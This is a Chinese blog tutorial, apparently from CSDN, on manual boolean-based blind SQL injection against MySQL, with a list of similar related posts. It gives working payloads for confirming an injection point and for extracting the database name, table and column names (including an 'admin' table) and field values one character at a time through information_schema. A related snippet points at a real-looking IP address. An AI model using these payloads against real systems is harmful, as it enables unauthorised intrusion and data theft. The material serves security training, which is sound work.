MySQL手工布尔盲注

最新推荐文章于 2024-07-09 21:13:18 发布
最新推荐文章于 2024-07-09 21:13:18 发布
阅读量437 收藏 2
点赞数
分类专栏: Web渗透 文章标签: MySQL注入 手工注入 Boolean注入 Bool注入 MySQL手注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L_KevinK/article/details/98373921
版权

MySQL手工布尔盲注

(1)测试注入点

(1.1)链接后加 ’ 号页面报错,爆出错误信息

(1.2)链接后加 ’ and 1=1–+ 返回页面正常

在这里插入图片描述

(1.3)链接后加 ’ and 1=2–+ 返回页面错误

(2)爆数据库相关信息

(2.1)使用 order by 语句爆出表字段数为8

(2.2)使用 union select 发现语句报错,此时不能使用联合查询语句,于是想到了布尔注入

(2.3)使用Burpsuite 爆数据库相关信息
' and length(database())=数值--+							#判断数据库名长度,
' and ord(substr( database(),1,1))=32--+					#数据库名对应位数的ASCLL码
' and substr( database(),1,1)=‘a’--+						#数据库名对应位数的值,推荐使用ASCLL码,使用二分法判断更加快速

(2.4)爆数据库表名

改变数值查询出想要的表名,此时也可以使用Burpsuite

' and ord(substr((select table_name from information_schema.tables where table_schema='表名' limit 0,1),1,1))=32--+				#表名对应位数的ASCLL码
' and substr((select table_name from information_schema.tables where table_schema='表名' limit 0,1),1,1)=‘a’--+						#表名对应位数的值

(2.5)爆表字段名
' and ord(substr((select column_name from information_schema.columns where table_name='admin' limit 0,1),1,1))=32--+
' and substr((select column_name from information_schema.columns where table_name='admin' limit 0,1),1,1)='a'--+

(2.6)爆字段值
' and ord(substr((select 字段名 from 表名 limit 0,1),1,1))=32--+
' and ord(substr((select 字段名 from 表名 where id=1),1,1))=32--+

L_KevinK
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
教科书般的mysql布尔盲注(附验证脚本)
qq_35855403的博客
08-16 1661
遇到一收费外挂,登录处抓包http://115.159.147.96/ap_Verify.php?a=nb&user=asdasdasdas&pass=A3DCB4D229DE6FDE0DB5686DEE47145D&key=8E7CACDD62339A1D7A100347055D9104&ver=163&soft=VM&num=EJGDCHHCDX...
MySQL布尔盲注
一个普普通通的博客
03-01 1479
Mysql注入布尔盲注
MySQL布尔盲注
fdhdgsdfdsa的博客
03-11 247
盲注注入的一种方式,是在页面只返回true和false时使用。 需要准备PHP知识 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 以上每个函数都可使用,但有可能被禁用,可选其他函数测试 一、判断是否存在盲注 可能需要闭合及注释操作,此处未演示 03.php?id=1 and 1=1
MYSQL布尔盲注手工注入笔记
GiDunPar的博客
02-02 1166
布尔盲注就是存在注入的页面没有回显,没办法用select 1,2,3....#来判断页面的回显 只能用对和错了一点一点注入 用到的函数: length(str) 返回指定字符串的长度 substr(str,pos,len)/substring(str,pos,len)...
mysql手工注入——盲注
weixin_44110913的博客
10-06 504
一 . 可以查看有几个数据库   命令如下 ' and (select count(*) from information_schema.schemata limit 0,1)=6 --+ 证明有6个数据库。   二 . 查数据库名长度 大于7 回显正常 大于8 回显不正常 我们可以确定数据库名长度为8   三 . 猜库名 (1)使用left()方法去猜解库名 Database=’securi...
mysql-blind(高级盲注+基于布尔).docx
01-23
MySQL 高级盲注布尔盲注详解】 MySQL盲注,特别是布尔盲注,是一种在目标页面无明显回显时检测SQL注入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。盲注...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
JDBC对MySQL数据库布尔字段的操作方法
09-03
本篇文章将深入探讨如何使用JDBC来操作MySQL数据库中的布尔字段,特别是在处理BIT(1)类型的布尔字段时需要注意的细节。 首先,MySQL数据库中的布尔类型通常表示为BIT(1),这是因为MySQL并没有原生的BOOLEANBOOL...
mysql加强 布尔教育 1-13 共46集
05-07
这套"mysql加强 布尔教育 1-13 共46集"的教程旨在深入强化对MySQL的掌握,涵盖了一系列关键概念和操作。 首先,从"数据库概念 布尔教育.mp4"开始,我们了解到数据库是组织和存储数据的系统,而MySQL是一种开源、...
PHP、mysql手工注入
10-12
【PHP与MySQL手工注入详解】 在互联网开发中,PHP与MySQL是常见的服务器端脚本语言和数据库管理系统,广泛应用于网站的构建。然而,随着技术的发展,网络安全问题也日益凸显,其中“手工注入”就是一种针对PHP与...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
十几分钟让你学会MySQL布尔和延迟盲注手工操作
xiaoi123的博客
12-28 458
作者:Max老白Gān丶 链接:http://www.lofter.com/lpost/1fefbc76_12d25dc31 来源:LOFTER 注入常用到的几个函数     1 mid(str,1,3) 字符串获取 这里我们要看到123456789 从第一个字节也就是1开始获取到3就截止了   1 ...
mysql数据库的布尔盲注_mysql注入-布尔盲注总结
weixin_28956075的博客
02-05 553
mysql布尔盲注总结布尔盲注常用函数:length()字符串长度判断left(a,b)从左侧截取a的前b位substr(a,b,c)从b位置开始,截取字符串a的c长度。ascii()将某个字符转换成相应的ascii码值。mid(a,b,c)从位置b开始,截取a字符串的c位ord函数与ascii()函数类似,将某个字符转换成相应的ascii码值。regrexp正则注入limit使用方法:limi...
mysql 布尔盲注_Mysql 高级盲注布尔盲注【sqli blind】
weixin_36381298的博客
02-07 242
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注的常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔盲注做详细说明,关于其它的技巧,后续还会再单...
打穿sqli-labs靶场——Day6 (less-8)手工布尔盲注
qq_45741871的博客
04-18 473
打穿sqli-labs靶场day6——less-8 手工布尔盲注
[MYSQL手工注入](2)基于布尔的SQL盲注实战
baguangman5501的博客
07-16 467
0x02 MYSQL 手工注入实战——基于布尔的SQL盲注 前言,之前有对MYSQL基于报错的手工注入进行过介绍,但今天的实验环境,并不是基于报错的SQL注入,而是一个基于布尔的SQL盲注测试流程。 这个网站的SQL注入漏洞,大概1年前就有人发现过了,我也是在找环境的过程中,突然发现的。这个网站是存在WAF的(WTS-WAF) 但是这个WAF并不是很管用,只是把空格与某些重要函数放到了黑...
mysql注入入门_sql注入入门之mysql布尔盲注
weixin_31727797的博客
02-19 142
1,实例 mysql 盲注点,如下,虽然这并不是个标标准准的盲注点,但并不影响我们用盲注的方式来获取1、http://www.vuln.com/wexpage.php?id=212,一阵单引号过后,目标1、http://www.vuln.com/wexpage.php?id=21'3,尝试闭合,还是前面的问题,不要一眼看到数字就认定它是个数字型注入,比如该实例就又是个字符型注入,我们只需闭合前面的...
MySQL手注布尔盲注详解
最新发布
m0_52484587的博客
07-09 257
说明存在注入,而且是字符型的注入!(如果是数字型的注入,那么就不用去闭合单引号)但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。这时,我们无法根据应用程序的返回页面得到我们需要的。基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回。说明当前数据库名长度为。
墨者 - SQL注入漏洞测试(布尔盲注)
吃肉唐僧的博客
07-01 5119
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
mysql手工布尔盲注
10-13
布尔盲注是一种常见的SQL注入攻击方式,可以通过构造特定的SQL语句来获取数据库中的敏感信息。手工布尔盲注是指通过手动构造SQL语句来进行盲注攻击,而非使用自动化工具。 在MySQL中,可以使用IF函数来进行布尔盲注攻击。IF函数的语法如下: IF(expr1,expr2,expr3) 如果expr1为真,则返回expr2,否则返回expr3。 例如,假设我们要获取数据库中名为“admin”的用户的密码,可以使用如下语句进行布尔盲注攻击: SELECT IF((SELECT password FROM users WHERE username='admin')='123456', 'true', 'false') 如果返回结果为“true”,则说明密码为“123456”,否则密码不是“123456”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值